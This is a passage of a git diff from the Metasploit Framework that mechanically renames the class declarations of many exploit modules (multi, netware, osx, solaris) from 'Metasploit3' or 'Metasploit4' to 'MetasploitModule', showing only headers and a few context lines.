-5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index fcecbbebdf..88087b8139 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index 01ea41fc06..5161aa9cc8 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index ecb6560c47..99f3775b53 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 2304aa8855..412626afd9 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 2823fe48f0..b5149373ed 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index de41281438..6a5942c984 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index ab1dd0e15b..fe8127cd92 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index c15c193ead..1c27b58489 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 1dab5491c3..26465c6334 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb index 501df43124..d2bca2ffd0 100644 --- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb +++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index ed53e0b7f2..6307eda55d 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b20a74ef78..4882496650 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index 9681bb3da0..3691b10e28 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index ee804483e5..b481303f09 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 18db711cc3..6b0159a527 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/xdh_x_exec.rb b/modules/exploits/multi/misc/xdh_x_exec.rb index 8e3c0fda70..129fe038fc 100644 --- a/modules/exploits/multi/misc/xdh_x_exec.rb +++ b/modules/exploits/multi/misc/xdh_x_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index a433889c5e..2a361b807f 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 5b0e336fc0..6f5190ac45 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index a6883a67ca..c609ef77bf 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index c6134b819a..5cb8006f8e 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 6f1f3652da..55bce31106 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 24a37cc018..273535b2d3 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index da27883df6..44fee16c47 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] } diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 5f19e6518f..29b4f79091 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb index 3317ebcd9a..0b7ec86a63 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index ffeb54e5a4..804b286342 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 51a57cbc44..aa63a817f5 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index 7f5a0f9234..db88821c4f 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Brute diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index d7b0a59908..668405d446 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index b22a3d9646..b34c130d95 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb index d391ce8da5..e9528b6b5b 100644 --- a/modules/exploits/multi/vpn/tincd_bof.rb +++ b/modules/exploits/multi/vpn/tincd_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'securerandom' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::EXE diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 786a20d57a..35ce7f691f 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -6,7 +6,7 @@ require 'timeout' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 04c141d2a7..6693f0923b 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 0ab1da752a..51a3178859 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index f3ec48b721..a79cdfa897 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 45f1f5cd58..175fc3b918 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index c7331b84ea..870e5fdfe2 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index e00fd67998..58f15eda96 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 27f17742a8..0c1d0842ce 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb index 3ba0b94a96..642b354d39 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb index b3f464b21a..8af9d76beb 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index d360a35626..d4db34dba8 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index fe08b1e373..d98f9e22b3 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index c61f1ceb23..651d321fc0 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 2e4a586b97..26e58fd9ce 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 28008e88b5..1061094e07 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index e0b2c5f914..6c3a95d1b3 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index c4683889ab..42b4c462cc 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb index 260632a90d..33de13001d 100644 --- a/modules/exploits/osx/local/persistence.rb +++ b/modules/exploits/osx/local/persistence.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index f22d6cb6a2..b438b4513c 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 0a031f7a11..32ec381c51 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index 97f9ae28dc..552003fd13 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index c77d4a4a2a..d4969cd478 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 019a6bb019..dddb7b82a0 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index fe54af173c..018af4fcbe 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index bfd0864d61..fddd890501 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index ff20c7fe02..25410875e1 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index 3d32b05a7c..99667e4a44 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 82404e2244..35011f1d02 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index e9e228911d..3dfedafd3d 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 3eca9265e6..03bc2152dd 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index bcd15fbb39..7e0e123d0a 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index ecf0331613..f65d028141 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index f71bdad36d..d7739db4ca 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git 